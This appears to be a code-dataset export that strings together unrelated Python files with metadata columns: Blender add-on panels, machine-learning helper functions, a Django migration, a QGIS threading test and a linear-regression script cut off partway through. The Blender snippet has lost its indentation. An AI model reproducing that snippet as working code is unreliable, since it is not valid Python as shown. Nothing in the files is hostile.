layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "batch_mode")
class SOLLUMZ_PT_import_geometry(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Geometry"
bl_parent_id = "FILE_PT_operator"
bl_order = 1
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "join_geometries")
class SOLLUMZ_PT_import_fragment(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Fragment"
bl_parent_id = "FILE_PT_operator"
bl_order = 2
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "split_by_bone")
class SOLLUMZ_PT_import_skeleton(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Skeleton"
bl_parent_id = "FILE_PT_operator"
bl_order = 3
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_import"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.import_settings, "import_ext_skeleton")
class SOLLUMZ_PT_export_main(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = ""
bl_parent_id = "FILE_PT_operator"
bl_options = {'HIDE_HEADER'}
bl_order = 0
@ classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
row = layout.row(align=True)
row.prop(operator.export_settings, "batch_mode")
sub = row.row(align=True)
sub.prop(operator.export_settings, "use_batch_own_dir",
text="", icon='NEWFOLDER')
class SOLLUMZ_PT_export_include(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Include"
bl_parent_id = "FILE_PT_operator"
bl_order = 1
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
sublayout = layout.column(heading="Limit to")
sublayout.enabled = (operator.export_settings.batch_mode == "OFF")
sublayout.prop(operator.export_settings, "use_selection")
sublayout.prop(operator.export_settings, "use_active_collection")
col = layout.column()
col.prop(operator.export_settings, "sollum_types")
class SOLLUMZ_PT_export_exclude(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Exclude"
bl_parent_id = "FILE_PT_operator"
bl_order = 2
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.export_settings, "exclude_skeleton")
class SOLLUMZ_PT_export_geometry(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Geometry"
bl_parent_id = "FILE_PT_operator"
bl_order = 3
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.export_settings, "use_transforms")
class SOLLUMZ_PT_export_fragment(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Fragment"
bl_parent_id = "FILE_PT_operator"
bl_order = 4
@classmethod
def poll(cls, context):
sfile = context.space_data
operator = sfile.active_operator
return operator.bl_idname == "SOLLUMZ_OT_export"
def draw(self, context):
layout = self.layout
layout.use_property_split = True
layout.use_property_decorate = False
sfile = context.space_data
operator = sfile.active_operator
layout.prop(operator.export_settings, "export_with_hi")
class SOLLUMZ_PT_TOOL_PANEL(bpy.types.Panel):
bl_label = "General Tools"
bl_idname = "SOLLUMZ_PT_TOOL_PANEL"
bl_category = "Sollumz Tools"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_order = 0
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="MODIFIER_DATA")
def draw(self, context):
layout = self.layout
layout.label(text="View")
layout.prop(context.scene, "hide_collision")
layout.prop(context.scene, "hide_high_lods")
layout.prop(context.scene, "hide_medium_lods")
layout.prop(context.scene, "hide_low_lods")
layout.prop(context.scene, "hide_very_low_lods")
layout.prop(context.space_data.overlay,
"show_bones", text="Show Skeleton")
class SOLLUMZ_PT_DEBUG_PANEL(bpy.types.Panel):
bl_label = "Debug"
bl_idname = "SOLLUMZ_PT_DEBUG_PANEL"
bl_category = "Sollumz Tools"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="PREFERENCES")
def draw(self, context):
layout = self.layout
row = layout.row()
row.operator("sollumz.debug_hierarchy")
row.prop(context.scene, "debug_sollum_type")
class SOLLUMZ_PT_VERTEX_TOOL_PANEL(bpy.types.Panel):
bl_label = "Vertex Painter"
bl_idname = "SOLLUMZ_PT_VERTEX_TOOL_PANELL"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="BRUSH_DATA")
def draw(self, context):
layout = self.layout
row = layout.row()
row.prop(context.scene, "vert_paint_color")
row.operator("sollumz.paint_vertices")
class SOLLUMZ_PT_TERRAIN_PAINTER_PANEL(bpy.types.Panel):
bl_label = "Terrain Painter"
bl_idname = "SOLLUMZ_PT_TERRAIN_PAINTER_PANEL"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_VERTEX_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="IMAGE")
def draw(self, context):
layout = self.layout
row = layout.row()
row.operator("sollumz.paint_tex1")
row.operator("sollumz.paint_tex2")
row = layout.row()
row.operator("sollumz.paint_tex3")
row.operator("sollumz.paint_tex4")
row = layout.row()
row.operator("sollumz.paint_a")
row.prop(context.scene, "vert_paint_alpha")
class SOLLUMZ_PT_YMAP_TOOL_PANEL(bpy.types.Panel):
bl_label = "Ymap Tools"
bl_idname = "SOLLUMZ_PT_YMAP_TOOL_PANEL"
bl_space_type = 'VIEW_3D'
bl_region_type = 'UI'
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_TOOL_PANEL.bl_idname
def draw_header(self, context):
# Example property to display a checkbox, can be anything
self.layout.label(text="", icon="FILE")
def draw(self, context):
layout = self.layout
row = layout.row()
row.operator("sollumz.importymap")
row.operator("sollumz.exportymap")
class SOLLUMZ_PT_OBJECT_PANEL(bpy.types.Panel):
bl_label = "Sollumz"
bl_idname = "SOLLUMZ_PT_MAIN_PANEL"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = 'object'
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
layout.use_property_split = True
obj = context.active_object
row = layout.row()
row.enabled = False
row.prop(obj, "sollum_type")
if not obj or obj.sollum_type == SollumType.NONE:
layout.label(
text="No sollumz objects in scene selected.", icon="ERROR")
class SOLLUMZ_PT_ENTITY_PANEL(bpy.types.Panel):
bl_label = "Entity Definition"
bl_idname = 'SOLLUMZ_PT_ENTITY_PANEL'
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "object"
bl_options = {'DEFAULT_CLOSED'}
bl_parent_id = SOLLUMZ_PT_OBJECT_PANEL.bl_idname
@ classmethod
def poll(cls, context):
aobj = context.active_object
return aobj != None and aobj.sollum_type == SollumType.DRAWABLE
def draw(self, context):
layout = self.layout
grid = layout.grid_flow(columns=2, even_columns=True, even_rows=True)
grid.use_property_split = True
aobj = context.active_object
grid.prop(aobj.entity_properties, "flags")
grid.prop(aobj.entity_properties, "guid")
grid.prop(aobj.entity_properties, "parent_index")
grid.prop(aobj.entity_properties, "lod_dist")
grid.prop(aobj.entity_properties, "child_lod_dist")
grid.prop(aobj.entity_properties, "num_children")
grid.prop(aobj.entity_properties, "ambient_occlusion_multiplier")
grid.prop(aobj.entity_properties, "artificial_ambient_occlusion")
grid.prop(aobj.entity_properties, "tint_value")
grid.prop(aobj.entity_properties, "lod_level")
grid.prop(aobj.entity_properties, "priority_level")
class SOLLUMZ_PT_MAT_PANEL(bpy.types.Panel):
bl_label = "Sollumz"
bl_idname = "SOLLUMZ_PT_MAT_PANEL"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = 'material'
bl_options = {'DEFAULT_CLOSED'}
def draw(self, context):
layout = self.layout
aobj = context.active_object
if context.active_object == None:
return
mat = aobj.active_material
if not mat or mat.sollum_type == MaterialType.NONE:
layout.label(text="No sollumz material active.", icon="ERROR")
class FlagsPanel:
bl_label = "Flags"
bl_options = {'DEFAULT_CLOSED'}
def get_flags(self, context):
raise NotImplementedError(
f"Failed to display flags. '{self.__class__.__name__}.get_flags()' method not defined.")
def draw(self, context):
data_block = self.get_flags(context)
self.layout.prop(data_block, "total")
self.layout.separator()
grid = self.layout.grid_flow(columns=2)
for index, prop_name in enumerate(data_block.__annotations__):
if index > data_block.size - 1:
break
grid.prop(data_block, prop_name)
class TimeFlagsPanel(FlagsPanel):
bl_label = "Time Flags"
select_operator = None
clear_operator = None
def draw(self, context):
super().draw(context)
if self.select_operator is None or self.clear_operator is None:
raise NotImplementedError(
f"'select_operator' and 'clear_operator' bl_idnames must be defined for {self.__class__.__name__}!")
flags = self.get_flags(context)
row = self.layout.row()
row.operator(self.select_operator)
row.prop(flags, "time_flags_start", text="from")
row.prop(flags, "time_flags_end", text="to")
row = self.layout.row()
row.operator(self.clear_operator)
class SOLLUMZ_MT_sollumz(bpy.types.Menu):
bl_label = "Sollumz"
bl_idname = "SOLLUMZ_MT_sollumz"
def draw(self, context):
layout = self.layout
def DrawSollumzMenu(self, context):
self.layout.separator()
self.layout.menu(SOLLUMZ_MT_sollumz.bl_idname, icon="BLENDER")
def register():
bpy.types.VIEW3D_MT_add.append(DrawSollumzMenu)
def unregister():
bpy.types.VIEW3D_MT_add.remove(DrawSollumzMenu)
| en | 0.669385 | # Example property to display a checkbox, can be anything # Example property to display a checkbox, can be anything # Example property to display a checkbox, can be anything # Example property to display a checkbox, can be anything # Example property to display a checkbox, can be anything | 2.176916 | 2 |
Useful scripts/UsefulScripts.py | SathyaKrishnan1211/Medium-Article-Code | 0 | 6632529 | <gh_stars>0
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from low_key.metrics import precision_binary,recall_binary,accuracy_score,f1_score
def train_test_split(X,y,test_size=0.2,random_state=42):
"""
Accepts only a dataframe or a numpy array as input.
:param X: input data X
:param y: input data y
:param test_size: specifies the size of the test dataset.
:param random_state: seed for shuffling the data
:return: X_train,X_test,y_train,y_test
"""
np.random.seed(random_state)
shuffled_index = np.random.permutation(len(X))
train_indices = shuffled_index[:int(len(X)*(1-test_size))]
    test_indices = shuffled_index[int(len(X)*(1-test_size)):]  # remaining rows, so train and test do not overlap
if type(X)==type(pd.DataFrame(data={1:[2,3]})):
X_train,X_test,y_train,y_test = X.iloc[train_indices],X.iloc[test_indices],y.iloc[train_indices],y.iloc[test_indices]
return X_train, X_test, y_train, y_test
elif type(X)==type(np.array([1,2])):
X_train,X_test,y_train,y_test = X[train_indices],X[test_indices],y[train_indices],y[test_indices]
return X_train, X_test, y_train, y_test
else:
raise TypeError("Only dataframes and numpy arrays are accepted as input")
def plot_decision_boundary(classifier,X,y,resolution=0.02,markers=None,colors=None):
"""
This is a function that is used to visualize the boundaries predicted by classifiers to classify the training data.
This function only takes uses two features even if more than two are given.
:param classifier: classifier model that is used to predict the labels
:param X: training data
:param y: training label
:param resolution: resolution of the plot
:param markers: markers for different classes
:param colors: colors for different classes
:return: a figure consisting of the boundaries for each class
"""
if markers==None:
markers = ['*','s','o']
if colors==None:
colors = ['blue','red','orange']
x_min,x_max = X[:,0].min()-0.1,X[:,0].max()+0.1 # x-axis range
y_min,y_max = X[:,1].min()-0.1,X[:,1].max()+0.1 # y_axis range
xx,yy = np.meshgrid(np.arange(x_min,x_max,resolution),
np.arange(y_min,y_max,resolution)) # creating a 2x2 array for the figure
classifier = classifier.fit(X,y)
Z = classifier.predict(np.c_[np.ravel(xx),np.ravel(yy)])
Z = Z.reshape(xx.shape)
plt.contourf(xx,yy,Z) # the contour plot
for i in np.unique(y):
plt.scatter(X[y==i,0],X[y==i,1],color=colors[i],marker=markers[i],label=i)
plt.legend()
plt.show()
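# Added illustration (the classifier and data here are made-up stand-ins): any object exposing
# fit(X, y) and predict(X) works with plot_decision_boundary above; a nearest-class-mean stub
# is enough to try it without external libraries.
class _DemoNearestMeanClassifier:
    def fit(self, X, y):
        # store the mean feature vector of each class
        self.means_ = {c: X[y == c].mean(axis=0) for c in np.unique(y)}
        return self
    def predict(self, X):
        classes = list(self.means_)
        dists = np.stack([np.linalg.norm(X - self.means_[c], axis=1) for c in classes], axis=1)
        return np.array(classes)[dists.argmin(axis=1)]
# e.g. plot_decision_boundary(_DemoNearestMeanClassifier(), X_toy, y_toy) with labels in {0, 1, 2}.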
def classifiers_metrics(models,X,y,test_size=0.1,random_state=42):
"""
:param models: a list or a numpy array consisting of classification models
:param X: The whole feature set. It need not be split into training and test sets
:param y: The whole true target labels.
:param test_size: Size of the test data
:param random_state: Specifies the random seed for splitting the dataset
:return: returns a dataframe consisting of precision, recall, f1_score and accuracy of all the classifiers passed
"""
X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=test_size,random_state=random_state)
precision_list,recall_list,accuracy_list,f1_list = [],[],[],[]
if type(models)!=type([1,2,3]) and type(models)!=type(np.array([1,2,3])):
raise TypeError("models should be of type list or numpy array")
for model in models:
model = model.fit(X_train,y_train)
y_pred = model.predict(X_test)
precision_list.append(precision_binary(y_test,y_pred))
recall_list.append(recall_binary(y_test,y_pred))
accuracy_list.append(accuracy_score(y_test,y_pred))
f1_list.append(f1_score(y_test,y_pred))
metric_df = pd.DataFrame(index=models,data={"Precision":precision_list,
"Recall":recall_list,
"Accuracy":accuracy_list,
"F1 Score":f1_list})
return metric_df
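# Added usage note (illustration): classifiers_metrics above expects already-instantiated
# binary classifiers, e.g. classifiers_metrics([model_a, model_b], X, y, test_size=0.2);
# the returned DataFrame is indexed by the model objects themselves, one row per classifier.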
def gini_impurity(value_set):
# node impurity measurement for decision tree
total_num = np.sum(value_set)
gini = 1
for j in value_set:
gini -= (j/total_num)**2
return np.round(gini,3)
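# Added illustration (toy class counts are arbitrary): a pure node has zero impurity and a
# perfectly mixed two-class node has the maximum binary impurity of 0.5.
def _demo_gini_impurity():
    return gini_impurity([10, 0]), gini_impurity([10, 10])   # expected (0.0, 0.5)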
def log_loss(y_true,y_proba):
import numpy as np
avg_loss = 0
for i,j in zip(y_true,y_proba):
log_loss = -1*(i*np.log(j) + (1-i)*np.log(1-j))
avg_loss += log_loss
return avg_loss/len(y_true) | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from low_key.metrics import precision_binary,recall_binary,accuracy_score,f1_score
def train_test_split(X,y,test_size=0.2,random_state=42):
"""
Accepts only a dataframe or a numpy array as input.
:param X: input data X
:param y: input data y
:param test_size: specifies the size of the test dataset.
:param random_state: seed for shuffling the data
:return: X_train,X_test,y_train,y_test
"""
np.random.seed(random_state)
shuffled_index = np.random.permutation(len(X))
train_indices = shuffled_index[:int(len(X)*(1-test_size))]
    test_indices = shuffled_index[int(len(X)*(1-test_size)):]  # remaining rows, so train and test do not overlap
if type(X)==type(pd.DataFrame(data={1:[2,3]})):
X_train,X_test,y_train,y_test = X.iloc[train_indices],X.iloc[test_indices],y.iloc[train_indices],y.iloc[test_indices]
return X_train, X_test, y_train, y_test
elif type(X)==type(np.array([1,2])):
X_train,X_test,y_train,y_test = X[train_indices],X[test_indices],y[train_indices],y[test_indices]
return X_train, X_test, y_train, y_test
else:
raise TypeError("Only dataframes and numpy arrays are accepted as input")
def plot_decision_boundary(classifier,X,y,resolution=0.02,markers=None,colors=None):
"""
This is a function that is used to visualize the boundaries predicted by classifiers to classify the training data.
    This function only uses the first two features even if more than two are given.
:param classifier: classifier model that is used to predict the labels
:param X: training data
:param y: training label
:param resolution: resolution of the plot
:param markers: markers for different classes
:param colors: colors for different classes
:return: a figure consisting of the boundaries for each class
"""
if markers==None:
markers = ['*','s','o']
if colors==None:
colors = ['blue','red','orange']
x_min,x_max = X[:,0].min()-0.1,X[:,0].max()+0.1 # x-axis range
y_min,y_max = X[:,1].min()-0.1,X[:,1].max()+0.1 # y_axis range
xx,yy = np.meshgrid(np.arange(x_min,x_max,resolution),
np.arange(y_min,y_max,resolution)) # creating a 2x2 array for the figure
classifier = classifier.fit(X,y)
Z = classifier.predict(np.c_[np.ravel(xx),np.ravel(yy)])
Z = Z.reshape(xx.shape)
plt.contourf(xx,yy,Z) # the contour plot
for i in np.unique(y):
plt.scatter(X[y==i,0],X[y==i,1],color=colors[i],marker=markers[i],label=i)
plt.legend()
plt.show()
def classifiers_metrics(models,X,y,test_size=0.1,random_state=42):
"""
:param models: a list or a numpy array consisting of classification models
:param X: The whole feature set. It need not be split into training and test sets
:param y: The whole true target labels.
:param test_size: Size of the test data
:param random_state: Specifies the random seed for splitting the dataset
:return: returns a dataframe consisting of precision, recall, f1_score and accuracy of all the classifiers passed
"""
X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=test_size,random_state=random_state)
precision_list,recall_list,accuracy_list,f1_list = [],[],[],[]
if type(models)!=type([1,2,3]) and type(models)!=type(np.array([1,2,3])):
raise TypeError("models should be of type list or numpy array")
for model in models:
model = model.fit(X_train,y_train)
y_pred = model.predict(X_test)
precision_list.append(precision_binary(y_test,y_pred))
recall_list.append(recall_binary(y_test,y_pred))
accuracy_list.append(accuracy_score(y_test,y_pred))
f1_list.append(f1_score(y_test,y_pred))
metric_df = pd.DataFrame(index=models,data={"Precision":precision_list,
"Recall":recall_list,
"Accuracy":accuracy_list,
"F1 Score":f1_list})
return metric_df
def gini_impurity(value_set):
# node impurity measurement for decision tree
total_num = np.sum(value_set)
gini = 1
for j in value_set:
gini -= (j/total_num)**2
return np.round(gini,3)
def log_loss(y_true,y_proba):
import numpy as np
avg_loss = 0
for i,j in zip(y_true,y_proba):
log_loss = -1*(i*np.log(j) + (1-i)*np.log(1-j))
avg_loss += log_loss
return avg_loss/len(y_true) | en | 0.736494 | Accepts only a dataframe or a numpy array as input.
:param X: input data X
:param y: input data y
:param test_size: specifies the size of the test dataset.
:param random_state: seed for shuffling the data
:return: X_train,X_test,y_train,y_test This is a function that is used to visualize the boundaries predicted by classifiers to classify the training data.
This function only takes uses two features even if more than two are given.
:param classifier: classifier model that is used to predict the labels
:param X: training data
:param y: training label
:param resolution: resolution of the plot
:param markers: markers for different classes
:param colors: colors for different classes
:return: a figure consisting of the boundaries for each class # x-axis range # y_axis range # creating a 2x2 array for the figure # the contour plot :param models: a list or a numpy array consisting of classification models
:param X: The whole feature set. It need not be split into training and test sets
:param y: The whole true target labels.
:param test_size: Size of the test data
:param random_state: Specifies the random seed for splitting the dataset
:return: returns a dataframe consisting of precision, recall, f1_score and accuracy of all the classifiers passed # node impurity measurement for decision tree | 3.955219 | 4 |
rental/migrations/0001_initial.py | rbed/DjangoOne | 0 | 6632530 | <filename>rental/migrations/0001_initial.py
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-08-10 05:48
from __future__ import unicode_literals
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('shelf', '0003_auto_20170810_0748'),
]
operations = [
migrations.CreateModel(
name='Rental',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('when', models.DateTimeField(default=datetime.datetime(2017, 8, 10, 5, 47, 22, 863277, tzinfo=utc))),
('returned', models.DateTimeField(blank=True, null=True)),
('what', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='shelf.BookItem')),
('who', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| <filename>rental/migrations/0001_initial.py
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-08-10 05:48
from __future__ import unicode_literals
import datetime
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('shelf', '0003_auto_20170810_0748'),
]
operations = [
migrations.CreateModel(
name='Rental',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('when', models.DateTimeField(default=datetime.datetime(2017, 8, 10, 5, 47, 22, 863277, tzinfo=utc))),
('returned', models.DateTimeField(blank=True, null=True)),
('what', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='shelf.BookItem')),
('who', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| en | 0.777942 | # -*- coding: utf-8 -*- # Generated by Django 1.10.2 on 2017-08-10 05:48 | 1.700906 | 2 |
tests/integration/thread_support/test_run.py | pyqgis/plutil | 0 | 6632531 | <filename>tests/integration/thread_support/test_run.py
# -*- coding: utf-8 -*-
"""
"""
from __future__ import unicode_literals
from __future__ import print_function
import logging
import threading
from time import sleep
from unittest import TestCase, SkipTest
from unittest.mock import MagicMock
from PyQt5.QtCore import QCoreApplication, QEventLoop
from qgis_plutil.thread_support.gui_side import GuiSide
from qgis_plutil.thread_support.messages.base import TsMessage
from qgis_plutil.thread_support.thread_side import ThreadSide
logger = logging.getLogger('tests.plutil.thread_support')
class WorkerThread(ThreadSide, threading.Thread):
def __init__(self, *args, **kwargs):
super(WorkerThread, self).__init__(name="WorkerThread", *args, **kwargs)
# Set this to terminate the thread.
self.stop = threading.Event()
def run(self):
self.thread_side_started()
while not self.stop.is_set():
pass
class AMessage(TsMessage):
def __init__(self, *args, **kwargs):
super(AMessage, self).__init__(*args, **kwargs)
self.on_thread_side_called = 0
self.on_on_gui_side = 0
def on_thread_side(self):
""" Executed just before the messages leaves the thread side. """
self.on_thread_side_called = self.on_thread_side_called + 1
def on_gui_side(self):
""" Executed when the message has reached GUI side. """
self.on_on_gui_side = self.on_on_gui_side + 1
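# Added note (illustration): in the tests below a message is expected to travel
#   WorkerThread.send_to_gui(msg) -> GuiSide.receiver() -> msg.on_gui_side()
# after msg.on_thread_side() has fired on the worker side; the two counters above exist so
# the tests can assert each hook ran exactly once.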
class TestTestee(TestCase):
def setUp(self):
self.plugin = MagicMock()
self.app = QCoreApplication([])
self.thread = WorkerThread(self.plugin)
self.testee = GuiSide()
self.testee.tie(self.thread)
self.thread.start()
sleep(0.5)
self.testee.receiver()
def tearDown(self):
self.thread.stop.set()
self.testee = None
self.app.exit()
def test_init(self):
logger.debug("Run GuiSide/ThreadSide test starting")
self.app.processEvents(QEventLoop.AllEvents, 1)
sleep(0.2)
self.assertEqual(self.thread.state, self.thread.STATE_CONNECTED)
msg = AMessage(self.plugin, self.thread)
self.assertIsNotNone(msg.message_id)
self.thread.send_to_gui(msg)
sleep(0.2)
self.testee.receiver()
self.app.processEvents(QEventLoop.AllEvents, 1)
self.assertEqual(msg.on_thread_side_called, 1)
        self.assertEqual(msg.on_on_gui_side, 1)  # the GUI-side hook should also have run exactly once
msg = AMessage(self.plugin, self.thread)
self.assertIsNotNone(msg.message_id)
self.thread.send_to_gui(msg)
sleep(0.2)
self.testee.receiver()
self.app.processEvents(QEventLoop.AllEvents, 1)
self.assertEqual(msg.on_thread_side_called, 1)
        self.assertEqual(msg.on_on_gui_side, 2)  # the GUI-side hook has now run once per message sent
logger.debug("Run GuiSide/ThreadSide test ends")
| <filename>tests/integration/thread_support/test_run.py
# -*- coding: utf-8 -*-
"""
"""
from __future__ import unicode_literals
from __future__ import print_function
import logging
import threading
from time import sleep
from unittest import TestCase, SkipTest
from unittest.mock import MagicMock
from PyQt5.QtCore import QCoreApplication, QEventLoop
from qgis_plutil.thread_support.gui_side import GuiSide
from qgis_plutil.thread_support.messages.base import TsMessage
from qgis_plutil.thread_support.thread_side import ThreadSide
logger = logging.getLogger('tests.plutil.thread_support')
class WorkerThread(ThreadSide, threading.Thread):
def __init__(self, *args, **kwargs):
super(WorkerThread, self).__init__(name="WorkerThread", *args, **kwargs)
# Set this to terminate the thread.
self.stop = threading.Event()
def run(self):
self.thread_side_started()
while not self.stop.is_set():
pass
class AMessage(TsMessage):
def __init__(self, *args, **kwargs):
super(AMessage, self).__init__(*args, **kwargs)
self.on_thread_side_called = 0
self.on_on_gui_side = 0
def on_thread_side(self):
""" Executed just before the messages leaves the thread side. """
self.on_thread_side_called = self.on_thread_side_called + 1
def on_gui_side(self):
""" Executed when the message has reached GUI side. """
self.on_on_gui_side = self.on_on_gui_side + 1
class TestTestee(TestCase):
def setUp(self):
self.plugin = MagicMock()
self.app = QCoreApplication([])
self.thread = WorkerThread(self.plugin)
self.testee = GuiSide()
self.testee.tie(self.thread)
self.thread.start()
sleep(0.5)
self.testee.receiver()
def tearDown(self):
self.thread.stop.set()
self.testee = None
self.app.exit()
def test_init(self):
logger.debug("Run GuiSide/ThreadSide test starting")
self.app.processEvents(QEventLoop.AllEvents, 1)
sleep(0.2)
self.assertEqual(self.thread.state, self.thread.STATE_CONNECTED)
msg = AMessage(self.plugin, self.thread)
self.assertIsNotNone(msg.message_id)
self.thread.send_to_gui(msg)
sleep(0.2)
self.testee.receiver()
self.app.processEvents(QEventLoop.AllEvents, 1)
self.assertEqual(msg.on_thread_side_called, 1)
        self.assertEqual(msg.on_on_gui_side, 1)  # the GUI-side hook should also have run exactly once
msg = AMessage(self.plugin, self.thread)
self.assertIsNotNone(msg.message_id)
self.thread.send_to_gui(msg)
sleep(0.2)
self.testee.receiver()
self.app.processEvents(QEventLoop.AllEvents, 1)
self.assertEqual(msg.on_thread_side_called, 1)
        self.assertEqual(msg.on_on_gui_side, 2)  # the GUI-side hook has now run once per message sent
logger.debug("Run GuiSide/ThreadSide test ends")
| en | 0.91894 | # -*- coding: utf-8 -*- # Set this to terminate the thread. Executed just before the messages leaves the thread side. Executed when the message has reached GUI side. | 2.193917 | 2 |
Algorithms/Linear Regression/LinearRegression.py | alex0019/ML-Algorithms | 7 | 6632532 | <gh_stars>1-10
############################################################################################################################
'''
Linear Regression implementation in Python 3
By - <NAME>
- Using Gradient descent algorithm for finding parameter values.
- Without regularization.
:: Variables used ::
1) data :- This variable is used for storing the data fetched from the dataset file.
2) x,y :- 'x' and 'y' are used for storing the columns of the dataset file in separate variables.
3) theta0, theta1 :- These are the parameters used in the hypothesis function. (Initialized with 0)
4) i :- For counting the number of iterations done for calculating gradient descent and the cost function.
5) min_j :- It stores the value returned by the cost function after passing the latest values of theta0 and theta1.
6) m :- For counting the number of training examples. (Total number of rows)
7) j :- For counting number of training data which has been used for evaluation of gradient function.
8) hypo :- For calculating hypothesis value (i.e h THETA (x) = theta0 + theta1*x).
9) cost_func0 :- This is used to store cost function value for gradient descent of theta0.
10) cost_func1 :-This is used to store cost function value for gradient descent of theta1.
(There are two cost function variables because they accumulate different values. As given in
the formula of gradient descent for theta1, each term ends up multiplied by 'x', which is not the
case when calculating the gradient descent step for theta0.)
11) alpha :- It is used for storing learning rate of gradient descent.
12) k :- For counting number of training data which has been used for evaluation of Cost function.
13) mini :- This stores the value of cost function after minimization.
:: Functions used ::
1) gradient_decent() :- This function is used for calculating the parameter values by using the gradient descent algorithm.
It returns the two calculated theta values (theta0, theta1).
2) cost_function() :- This function is used for calculating the cost function or squared mean error.
'''
##################################################################################################################################
import pandas as pd # Importing required modules
import matplotlib.pyplot as plt
import numpy as np
def gradient_decent(x,y,theta0,theta1): # This function will calculate parameter values using the gradient descent algorithm.
m = len(x) # Initializing total number of training data.
j=0 # Initializing counter for counting number of training data which has been used in calculating parameter values.
hypo = 0 # Initializing variable for storing hypothesis equation value.
cost_func0 = 0 # Initializing for storing cost function values.
cost_func1 = 0
    alpha = 0.01 # Initializing the learning rate for the gradient descent algorithm.
while j<m: # finding sum of all the derivatives for calculating gradient descent.
hypo = theta0 + theta1*x[j]
cost_func0 = cost_func0 + (hypo - y[j])
cost_func1 = cost_func1 + (hypo - y[j])*x[j]
j+=1
